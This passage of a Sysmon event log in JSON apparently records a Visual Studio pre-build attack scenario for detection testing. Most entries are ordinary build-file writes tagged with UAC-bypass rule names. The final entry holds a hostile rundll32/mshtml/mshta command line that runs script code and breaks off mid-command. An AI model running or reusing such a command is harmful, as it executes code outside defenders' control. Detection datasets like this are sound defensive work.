Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\NuGetScratch\\lock\\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3","UtcTime":"2021-01-26 
13:21:13.560"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429129,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:13.560814Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.560","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\NuGetScratch\\lock\\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3","UtcTime":"2021-01-26 13:21:13.561"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429130,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:13.561514Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token 
Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:14:25.290","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.log","UtcTime":"2021-01-26 13:21:13.683"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429131,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:13.683762Z"}},"Version":2}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\bouss\\source\\repos\\blabla\\","Description":"MSBuild.exe","FileVersion":"16.6.0.22303","Hashes":"SHA1=20456AC066815ED10C6CEF51AF5431ED6001532F,MD5=35DC099BE64FA5AB4C01DDA908745240,SHA256=5083FD9C0AB7ECAEE85B04A22EBD29A88D7BC75CB02186D9C9736269B8AC10A9,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","IntegrityLevel":"Medium","LogonGuid":"00247C92-5082-600D-0000-0020A246F726","LogonId":"0x26f746a2","OriginalFileName":"MSBuild.exe","ParentCommandLine":"\"C:\\Program Files (x86)\\Microsoft Visual 
Studio\\2019\\Community\\Common7\\IDE\\devenv.exe\" \"C:\\Users\\bouss\\source\\repos\\blabla\\blabla.sln\"","ParentImage":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ParentProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ParentProcessId":7664,"ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"Product":"Microsoft® Build Tools®","RuleName":"","TerminalSessionId":5,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2021-01-26 13:21:13.688"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2429132,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:13.690036Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:14:25.641","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\blabla.lastbuildstate","UtcTime":"2021-01-26 
13:21:13.972"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429134,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:13.972503Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.975","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd","UtcTime":"2021-01-26 13:21:13.975"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429135,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:13.975523Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on 
MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.975","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd","UtcTime":"2021-01-26 13:21:13.975"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429136,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:13.975732Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:15:06.578","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.command.1.tlog","UtcTime":"2021-01-26 
13:21:14.363"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429140,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:14.399477Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.394","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmp5938b880d43743db91973c95f519f06b.tmp","UtcTime":"2021-01-26 13:21:14.394"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429141,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:14.425366Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC 
Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.394","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmp5938b880d43743db91973c95f519f06b.tmp","UtcTime":"2021-01-26 13:21:14.395"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429142,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:14.425472Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.396","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmp19546d957b6e4d15b83f93a323d5f087.rsp","UtcTime":"2021-01-26 
13:21:14.396"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429143,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:14.425565Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.396","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmp19546d957b6e4d15b83f93a323d5f087.rsp","UtcTime":"2021-01-26 13:21:14.396"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429144,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:14.425664Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.826","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.write.1.tlog","UtcTime":"2021-01-26 13:21:14.852"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429148,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:14.871509Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.826","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.write.1.tlog","UtcTime":"2021-01-26 
13:21:14.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429149,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:14.871745Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.818","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.read.1.tlog","UtcTime":"2021-01-26 13:21:14.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429150,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:14.871980Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.818","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.read.1.tlog","UtcTime":"2021-01-26 13:21:14.854"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429151,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:14.872190Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:15:06.578","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.command.1.tlog","UtcTime":"2021-01-26 
13:21:14.855"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429152,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:14.872564Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:23.229","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Microsoft\\VSApplicationInsights\\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\\20210126132123_277b7688d03b431eb925a7d64307d79a.tmp","UtcTime":"2021-01-26 13:21:23.229"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429153,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:23.229964Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using 
MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:23.302","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Microsoft\\VSApplicationInsights\\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\\20210126132123_dd350a9897114eee834fb0993b4dee7e.tmp","UtcTime":"2021-01-26 13:21:23.302"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429154,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:23.303639Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:23.305","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Microsoft\\VSApplicationInsights\\vstelf144292e-e3b2-4011-ac90-20e5c03fbce5\\20210126132123_195f3c1acef04eaeb6f67d3ff46e5958.tmp","UtcTime":"2021-01-26 
13:21:23.305"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429155,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:23.305903Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:33.196","Image":"C:\\windows\\system32\\mmc.exe","ProcessGuid":"00247C92-EC0A-600F-0000-00100AEFCC2C","ProcessId":22932,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\Downloads\\prebuildevent_visual_studio.evtx","UtcTime":"2021-01-26 13:21:33.197"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429156,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:33.197967Z"}},"Version":2}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd.exe /C rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%%20ActiveXObject(\"WScript.Shell\").run(\"mshta 
